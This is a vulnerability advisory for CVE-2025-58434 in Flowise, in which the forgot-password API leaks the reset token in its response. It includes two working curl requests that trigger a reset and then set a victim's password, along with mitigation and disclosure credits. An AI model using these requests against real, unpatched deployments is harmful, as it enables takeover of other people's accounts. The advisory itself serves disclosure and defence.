CriticalCVSS 9.8Account TakeoverCVE-2025-58434
Published August 2025
Flowise Account Takeover via Token Leakage
BugBunny.ai discovered a critical vulnerability in Flowise (43,000+ GitHub stars, acquired by Workday) that allows complete account takeover through token leakage in the password reset flow. The temporary reset token is returned in the API response, enabling attackers to reset any user's password.
Responsibly DisclosedView CVE →
TL;DR
Password reset token leaked in API response
Impact:Complete account takeover of any user account
Vector:Attacker triggers forgot-password for victim, token returned in response
Surface:Local and cloud Flowise deployments with password auth enabled
Status:Fixed in Flowise v2.1.0
Attack Flow
- Attacker sends POST to
/api/v1/account/forgot-passwordwith victim's email - API response includes the
tempTokenin the JSON body - Attacker uses the token to call
/api/v1/account/reset-password - Victim's password is changed to attacker's chosen password
- Attacker logs in as victim with full account access
Step 1: Trigger Password Reset
curl -i -X POST https://<target>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<victim@example.com>"}}'
# Response excerpt (201 Created)
{
"user": {
"id": "<redacted-uuid>",
"email": "<victim@example.com>",
"tempToken": "<redacted-tempToken>",
"tokenExpiry": "2025-08-19T13:00:33.834Z"
}
}Step 2: Reset Password with Leaked Token
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<victim@example.com>",
"tempToken":"<redacted-tempToken>",
"password":"NewSecurePassword123!"
}
}'Mitigation
- Upgrade to Flowise v2.1.0 or later immediately
- The fix removes the token from the API response
- Tokens are now only sent via the email delivery mechanism
Credits & Disclosure
Identified by BugBunny.ai and responsibly disclosed to the Flowise maintainers.
Reporter: BugBunny.aiCVE-2025-58434Flowise 43k+ stars